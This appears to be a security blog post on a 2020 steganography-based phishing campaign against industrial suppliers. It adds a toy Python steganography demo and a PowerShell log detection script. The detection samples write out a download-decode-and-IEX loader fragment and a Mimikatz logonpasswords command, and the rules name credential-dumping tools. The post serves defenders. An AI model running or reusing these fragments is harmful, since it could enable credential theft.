In May 2020, equipment suppliers for the industrial sector in several countries were targeted with an attack that used unconventional techniques to evade detection, according to researchers at Kaspersky. The attacks started with an urgent-sounding phishing email carrying a malicious Microsoft Office document with obfuscated macros. Targets were located in Germany, the UK, Italy, and Japan, and each email was written in the target's language. If the localization of the victim's operating system did not match the language of the phishing email, the malware would not fully execute; besides narrowing the attack to the intended targets, this check also keeps the sample from detonating in an analysis sandbox configured for a different locale. The macros launch a PowerShell script that selects a URL on the legitimate public image hosting services imgur[dot]com or imgbox[dot]com and downloads an image in which encrypted data has been hidden using steganography. The key needed to decrypt that data is not stored in the script as a plain string: it is recovered from the message of an exception raised by an error that was placed in the script on purpose. The decrypted data is a second, obfuscated PowerShell script, which in turn runs a third PowerShell script, an obfuscated sample of Trojan-PSW.PowerShell.Mimikatz. The attackers use the Mimikatz utility to steal the credentials of Windows accounts cached on the victim's computer. After a successful infection, the attackers could use this foothold in the supplier's network as a pivot point for later attacks on the supplier's industrial enterprise clients.
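To make the loader's hiding technique concrete, here is an added Python example (written for this summary, not code from Kaspersky or the campaign itself) that embeds an encrypted payload in the least-significant bits of a constructed in-memory "image", recovers the key from the message of a deliberately failing operation, and extracts and decrypts the payload. The cover image is a synthetic gradient rather than a real PNG, the keystream is a toy SHA-256 construction, and the `int()` call used to raise the exception is an assumption standing in for whatever error the real script used; the page only states that the key lived in an exception message.

```python
import hashlib
import re


def make_cover_image(num_bytes: int) -> bytearray:
    """Constructed cover: a flat array of 8-bit values standing in for decoded pixel channels."""
    return bytearray((i * 7) & 0xFF for i in range(num_bytes))


def keystream(key: str, length: int) -> bytes:
    """Toy counter-mode keystream derived from SHA-256 (illustrative, not a real cipher)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key.encode() + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(data: bytes, key: str) -> bytes:
    """Symmetric: the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def lsb_embed(cover: bytearray, payload: bytes) -> bytearray:
    """Write a 4-byte length header plus payload, one bit per pixel value, into the LSBs."""
    framed = len(payload).to_bytes(4, "big") + payload
    if len(framed) * 8 > len(cover):
        raise ValueError("cover image too small for payload")
    stego = bytearray(cover)
    bit_index = 0
    for byte in framed:
        for shift in range(7, -1, -1):
            stego[bit_index] = (stego[bit_index] & 0xFE) | ((byte >> shift) & 1)
            bit_index += 1
    return stego


def lsb_extract(stego: bytes) -> bytes:
    """Read the length header, then that many bytes, from the pixel LSBs."""
    def read_bytes(offset_bits: int, count: int) -> bytes:
        out = bytearray()
        for i in range(count):
            value = 0
            for j in range(8):
                value = (value << 1) | (stego[offset_bits + i * 8 + j] & 1)
            out.append(value)
        return bytes(out)

    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def key_from_deliberate_error() -> str:
    """
    The key never appears as a string constant. An operation that is guaranteed to fail
    is executed, and the key is pulled out of the exception text. int() on a non-numeric
    literal is an assumed stand-in for the real script's deliberate error.
    """
    try:
        int("b9f2-not-a-number-7c1e")  # intentionally invalid; always raises ValueError
    except ValueError as err:
        # CPython message: "invalid literal for int() with base 10: '<literal>'"
        return re.search(r"'([^']+)'", str(err)).group(1)
    raise RuntimeError("expected the conversion to fail")


def hide_payload(payload: bytes, cover_size: int = 4096) -> bytearray:
    key = key_from_deliberate_error()
    return lsb_embed(make_cover_image(cover_size), xor_bytes(payload, key))


def recover_payload(stego: bytes) -> bytes:
    key = key_from_deliberate_error()
    return xor_bytes(lsb_extract(stego), key)


def max_pixel_delta(cover: bytes, stego: bytes) -> int:
    """How far any pixel value moved; LSB embedding never changes a value by more than 1."""
    return max(abs(c - s) for c, s in zip(cover, stego))


# Constructed placeholder for the "second stage"; it is plain text and is never executed.
SAMPLE_SECOND_STAGE = b"Write-Host 'stage two would run here'"

if __name__ == "__main__":
    image = hide_payload(SAMPLE_SECOND_STAGE)
    print("max pixel change:", max_pixel_delta(make_cover_image(4096), image))
    print("recovered:", recover_payload(image))
```

The `max_pixel_delta` check is the reason the technique survives casual inspection: every pixel value is within 1 of the original, so the image looks and decodes normally, and because the bits are encrypted before embedding, a defender who does strip the LSBs still sees only noise without the key.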
This attack used several unconventional techniques to make it hard to detect and hard for researchers to analyze. By layering complexity this way, the attackers buy a longer window to infect more victims before readily available detection signatures are deployed. Because the payload was hidden with steganography inside a valid image downloaded from legitimate, widely used websites, network monitoring that relies on reputation or known-bad indicators would not flag these downloads; the traffic is ordinary HTTPS to sites most organizations already allow. The behavior on the endpoint is far less ordinary: an Office document spawning PowerShell, PowerShell fetching an image and decoding it into more code, and a script reading credentials out of LSASS memory the way Mimikatz does. A service such as Managed Endpoint Detection and Response, which is offered through Binary Defense, would be able to detect that abnormal behavior on the targeted device and stop it before it has a chance to spread. Defenders could also block communications with public image hosting services if they are not needed for the organization's operations, although that can cause unintended problems for employees viewing websites that embed images from those hosts. As attacks using steganography continue to evolve, attackers will likely move to new websites to host their images, so detection that keys on the endpoint behavior will outlast any list of blocked domains.
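One way to turn the behavioral points above into a check, as an added example that is not Binary Defense's or Kaspersky's code: triage PowerShell script-block log text (the body of Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) for the combination of an image-host URL, a download primitive, bitmap/pixel access, and decode-and-execute calls. The regexes and thresholds are this example's own approximations, and the sample script blocks are constructed fragments carrying indicators rather than real campaign samples.

```python
import re

# Each rule names a behaviour from the campaign description; the patterns are assumptions
# that approximate how such behaviour shows up in PowerShell source text.
RULES = {
    "image_host_url": re.compile(r"https?://(?:[\w-]+\.)*(?:imgur|imgbox)\.com/\S+", re.I),
    "web_download": re.compile(r"Net\.WebClient|DownloadData|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "pixel_access": re.compile(r"System\.Drawing\.Bitmap|\.GetPixel\(|LockBits", re.I),
    "decode_and_run": re.compile(r"FromBase64String|Invoke-Expression|\bIEX\b", re.I),
    "locale_check": re.compile(r"Get-Culture|Get-WinSystemLocale|CurrentUICulture", re.I),
    "credential_dump": re.compile(r"mimikatz|sekurlsa|logonpasswords", re.I),
}


def match_rules(script_text: str) -> set:
    """Return the names of every rule whose pattern appears in the script block."""
    return {name for name, rx in RULES.items() if rx.search(script_text)}


def classify(script_text: str):
    """
    Verdict plus the rule hits behind it. The loader verdict requires the *combination*
    of fetching from an image host, reading pixels, and decoding into executable code;
    an image-host URL with a plain download only earns a review, which is the
    false-positive case the text warns about when blocking image hosts outright.
    """
    hits = match_rules(script_text)
    if "credential_dump" in hits:
        return "credential-theft", hits
    if {"image_host_url", "pixel_access", "decode_and_run"} <= hits:
        return "stego-loader", hits
    if {"image_host_url", "web_download"} <= hits:
        return "review", hits
    return "none", hits


# Constructed sample script blocks (not real campaign samples). Each stands in for the
# ScriptBlockText field of one 4104 event.
SAMPLES = {
    "wallpaper": (
        "Invoke-WebRequest -Uri https://imgur.com/example-logo.png "
        "-OutFile $env:TEMP\\logo.png"
    ),
    "loader": (
        "if ((Get-Culture).Name -ne 'de-DE') { exit }\n"
        "$b = (New-Object Net.WebClient).DownloadData('https://imgbox.com/example.png')\n"
        "$img = New-Object System.Drawing.Bitmap (New-Object IO.MemoryStream(,$b))\n"
        "for ($x = 0; $x -lt $img.Width; $x++) { $p = $img.GetPixel($x, 0) }\n"
        "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))"
    ),
    "stage3": "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'",
    "admin": "Get-Culture | Select-Object Name, DisplayName",
}


def triage(samples: dict) -> dict:
    """Map each sample name to its verdict."""
    return {name: classify(text)[0] for name, text in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name:10s} -> {verdict}")
```

Script block logging must be enabled for this to see anything, and obfuscation will defeat the simple `IEX` and `FromBase64String` patterns in the first stage; the logged text of later stages is the de-obfuscated code PowerShell actually ran, which is where these rules are most useful.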
More can be read here: https://www.scmagazine.com/home/security-news/cybercrime/multilingual-malware-attacks-on-industrial-sector-suppliers-designed-to-thwart-detection/